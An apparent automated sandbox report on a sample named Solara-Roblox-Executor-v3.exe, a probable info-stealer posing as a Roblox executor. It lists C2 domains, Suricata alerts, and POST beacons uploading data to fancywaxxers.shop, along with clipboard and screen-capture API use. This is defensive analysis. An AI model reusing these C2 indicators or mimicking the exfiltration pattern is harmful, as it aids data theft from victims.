C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: nearycrepso.shop
Source: Malware configuration extractor	URLs: fancywaxxers.shop
Source: Malware configuration extractor	URLs: cloudewahsj.shop
Source: Malware configuration extractor	URLs: noisycuttej.shop
Source: Malware configuration extractor	URLs: abruptyopsn.shop
Source: Malware configuration extractor	URLs: wholersorie.shop
Source: Malware configuration extractor	URLs: rabidcowse.shop
Source: Malware configuration extractor	URLs: framekgirus.shop
Source: Malware configuration extractor	URLs: tirepublicerj.shop

Source: global traffic

TCP traffic: 192.168.2.5:52375 -> 1.1.1.1:53

Source: Joe Sandbox View

IP Address: 104.21.96.1 104.21.96.1

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49709 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49711 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49704 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49710 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49707 -> 104.21.96.1:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fancywaxxers.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 51Host: fancywaxxers.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2EKJAD3T7WDXLUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12809Host: fancywaxxers.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=DAKKXE4EIJND8HPYCXYUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15087Host: fancywaxxers.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=DVE80MC68OH49RH1N7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20571Host: fancywaxxers.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=OXAT6TVT3CL1XKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1236Host: fancywaxxers.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=G9COZEGBVXJQXXUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 567879Host: fancywaxxers.shop

Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: fancywaxxers.shop

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fancywaxxers.shop

Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2077658211.0000000005844000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2077658211.0000000005844000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2077658211.0000000005844000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2077658211.0000000005844000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2077658211.0000000005844000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2077658211.0000000005844000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2077658211.0000000005844000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2050616380.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2105519914.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000002.2145355482.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2093473590.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2114278672.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://microsoft.cop
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2077658211.0000000005844000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2077658211.0000000005844000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2077658211.0000000005844000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2077658211.0000000005844000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051882953.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051946446.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051821112.00000000057C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078705562.000000000581F000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078766043.0000000005824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078705562.000000000581F000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078766043.0000000005824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051882953.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051946446.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051821112.00000000057C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051882953.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051946446.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051821112.00000000057C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051882953.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051946446.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051821112.00000000057C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078705562.000000000581F000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078766043.0000000005824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078705562.000000000581F000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078766043.0000000005824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051882953.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051946446.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051821112.00000000057C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051882953.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051946446.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051821112.00000000057C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051882953.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051946446.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051821112.00000000057C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000002.2145355482.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2093473590.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2105519914.000000000302F000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2114278672.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2050616380.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/0
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2105519914.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000002.2145355482.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2093473590.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2114278672.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/141638
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2105519914.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000002.2145355482.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2093473590.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2114278672.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/C
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000002.2145454851.000000000302F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/C1
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2105519914.000000000302F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/a
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2114278672.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/api
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000002.2145355482.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/api#
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2140783049.000000000302F000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000002.2145454851.000000000302F000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2114278672.000000000302F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/api/(b
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2050616380.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/apiO
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2077082218.0000000005817000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2077267157.0000000005818000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/apiPS
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2105519914.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000002.2145355482.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2114278672.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/i
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000002.2145454851.000000000302F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/q
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2140783049.000000000302F000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000002.2145454851.000000000302F000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2114278672.000000000302F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/y
Source: Solara-Roblox-Executor-v3.exe, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2094257173.000000000302F000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2114278672.0000000003023000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2093436705.000000000302F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop:443/api
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078766043.0000000005824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078404139.0000000005AAF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078404139.0000000005AAF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078705562.000000000581F000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078766043.0000000005824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078705562.000000000581F000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078766043.0000000005824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051882953.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051946446.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051821112.00000000057C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051882953.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051946446.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051821112.00000000057C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078404139.0000000005AAF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078404139.0000000005AAF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078404139.0000000005AAF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078404139.0000000005AAF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078404139.0000000005AAF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078404139.0000000005AAF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704

Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49710 version: TLS 1.2

Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe

Code function: 6_2_00433070 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

6_2_00433070

Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe

Code function: 6_2_00433070 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

6_2_00433070

Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe

Code function: 6_2_00433210 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,StretchBlt,DeleteObject,SelectObject,DeleteDC,ReleaseDC,DeleteObject,

6_2_00433210

Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 0_2_0030EA8E	0_2_0030EA8E
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 0_2_00303440	0_2_00303440
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 0_2_00310502	0_2_00310502
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 0_2_002FDDE2	0_2_002FDDE2
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 0_2_002F96DB	0_2_002F96DB
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 3_2_0030EA8E	3_2_0030EA8E
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 3_2_00303440	3_2_00303440
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 3_2_00310502	3_2_00310502
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 3_2_002FDDE2	3_2_002FDDE2
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 3_2_002F96DB	3_2_002F96DB
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_00423811	6_2_00423811
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_0042B8C3	6_2_0042B8C3
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_0043A940	6_2_0043A940
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_0043EA10	6_2_0043EA10
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_0040DA95	6_2_0040DA95
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_0043F370	6_2_0043F370
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_0040CBF6	6_2_0040CBF6
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_00410BB3	6_2_00410BB3
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_00426470	6_2_00426470
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_004374E0	6_2_004374E0
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_00421570	6_2_00421570
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_00408690	6_2_00408690
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_00418F2D	6_2_00418F2D
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_00426800	6_2_00426800
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_00422810	6_2_00422810
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_0042781B	6_2_0042781B
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_004058C0	6_2_004058C0
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_004160E7	6_2_004160E7
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_004298E8	6_2_004298E8
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_0041A0F0	6_2_0041A0F0
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_00409090	6_2_00409090
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_004038B0	6_2_004038B0
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_0041D0B0	6_2_0041D0B0
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_0041C8B0	6_2_0041C8B0
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_004240B0	6_2_004240B0
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_00406140	6_2_00406140
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_0043E170	6_2_0043E170
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_0043C11D	6_2_0043C11D
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_0043B920	6_2_0043B920
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_00428125	6_2_00428125
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_00422130	6_2_00422130
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_0041993B	6_2_0041993B
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_0042D1E2	6_2_0042D1E2
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_00429195	6_2_00429195
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_00404260	6_2_00404260
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_00425A00	6_2_00425A00
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_00424200	6_2_00424200
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_0043B210	6_2_0043B210
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_0043E220	6_2_0043E220
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_0042CA26	6_2_0042CA26
